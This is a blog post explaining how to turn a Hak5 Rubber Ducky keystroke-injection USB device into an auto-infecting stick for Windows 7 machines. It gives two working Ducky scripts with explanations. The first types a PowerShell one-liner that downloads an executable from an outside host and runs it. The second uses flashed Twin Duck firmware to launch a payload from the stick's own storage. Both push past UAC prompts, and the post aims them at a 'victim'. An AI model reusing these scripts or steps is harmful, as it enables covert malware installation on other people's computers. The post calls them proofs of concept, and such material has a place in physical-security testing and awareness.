Apr 13, 2014

Return Of USB Autorun Infections Aka Rubber Ducky

Do you remember malware-loaded USB sticks infecting computers via USB autorun? Plug them into your computer and you get automatically infected with malware. Fortunately USB autorun is disabled nowadays on most operating systems. But what if there was a clever way to bring back the USB-auto-pwn sticks by just applying some technical hacks...?

I will show you two ways how to easily turn a special USB device called Rubber Ducky into an auto-pwn USB stick that works like malware infected USB sticks with autorun enabled. The following Rubber Ducky scripts will bring back exactly this functionality and will provide you once more with an insert-and-own USB stick that requires no further manipulation than inserting the Rubber Ducky into a victim's USB slot.

I recently got my hands on Hak5's Rubber Ducky. Rubber Ducky is essentially a Human Interface Device (HID) emulating a keyboard while looking like a normal USB stick. The Ducky can take a micro-SD card which can be loaded with programmable injections. These injections contain a series of pre-compiled keystrokes that are fired as soon as the Rubber Ducky connects to a computer. This basically allows a person with malicious intent to send arbitrary keystrokes to your computer if you mistake the Rubber Ducky for a normal USB stick (because you found it in the parking lot or someone gave it to you for free ...) and insert it into your computer.

Both methods I'll present work on Windows machines but can be tweaked to work on other operating systems. Since the Ducky sends a hardcoded set of keystrokes you have to test your code very carefully on a machine which is as similar to the potential victim's machine as possible.

The two methods leveraged for auto-infecting Windows 7 machines are
  • Using powershell (pre-installed since Windows 7) to download and execute malware (internet connection required).
  • Turning the Rubber Ducky into a Twin Duck - this means flashing a new firmware on the Rubber Ducky. The Twin Duck let's your Ducky keep it's USB mass storage purpose while simultaneously launching a set of keystrokes. The mass storage part of the USB stick will carry the malware while the keystrokes will execute it (no internet connection required).

Method 1: Download & Execute Malware

I will skip the basics on how to put new payloads (i.e. sets of keystrokes) on the Ducky. You can easily read it up elsewhere.

Use this script to download and execute a .exe file from the internet. This requires of course a working internet connection on the target computer.

 DELAY 10000  
 GUI r  
 DELAY 100  
 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://download.piriform.com/ccsetup412.exe','%TEMP%\update.exe'); Start-Process "%TEMP%\update.exe"  
 DELAY 5000  

What does the script do?

It waits 10 seconds after the Rubber Ducky is plugged into the computer (the Ducky has to install itself first, this ensures it has enough time to finish driver installation without starting the payload too early).
It opens 'run' and opens a powershell which will automatically download and execute an .exe file you specified. For this demonstration I used the harmless CCleaner software. It will be saved to the tmp folder.
5 seconds pass (for finishing the download), you may adjust this time if the target's internet connection is ridiculously slow or if you download large files.
The file is automatically executed.
Windows User Account Control is rendered useless by pressing left and hitting enter and therefore allowing the file to execute.

Method 2: Twin Duck For Offline-Infections

The second method involves flashing a new firmware on your Rubber Ducky. The new firmware version is called Twin Duck (c_duck_v2.1.hex) and can be found here. No idea of how to flash the Rubber Ducky? Follow this step-by-step tutorial which takes you by the hand and guides you through the process.

Done flashing? Your Twin Duck is working? Great! Now you can use this injection to make your Ducky navigate to its USB mass storage and execute an arbitrary file from there:

 DELAY 10000  
 GUI e  
 DELAY 300  
 DELAY 300  
 DELAY 300  
 STRING <insert first letter of your payload here>  
 DELAY 1500  
 DELAY 300

What does the script do?

For the reasons as stated above, the Ducky waits 10 seconds before doing something.
It opens the file system browser and selects the first removable storage device (hitting 'r' for removable storage), which is usually the Rubber Ducky you just inserted. You may have to twitch this letter if your target runs non-English versions of Windows.
Rubber Ducky now enters its own file system.
You have to insert the first letter of your payload in the code above for Rubber Ducky to select it with an according keystroke.
The file is then executed and UAC is avoided by pressing 'Yes' as soon as it appears.

Closing thoughts

The Rubber Ducky can be a mighty tool in experienced hands. The two scripts shown here are just proof-of-concepts for specific Windows 7 systems but not much effort is required to adjust the scripts for other operating systems or setups. Anti-Virus software will be able to recognize your payloads (if you don't make them fully undetectable before) but AV won't help you against the core function of the Rubber Ducky, which is acting like a virtual keyboard an sending keystrokes to your computer.

TL;DR: The functionality of infected autorun USB sticks can be revived by using Hak5's Rubber Ducky. Two proof-of-concept scripts are presented above for this purpose. The first script requires an internet connection at the target computer, the second does not require internet connectivity. This information is not intended for illegal purposes.

No comments:

Post a Comment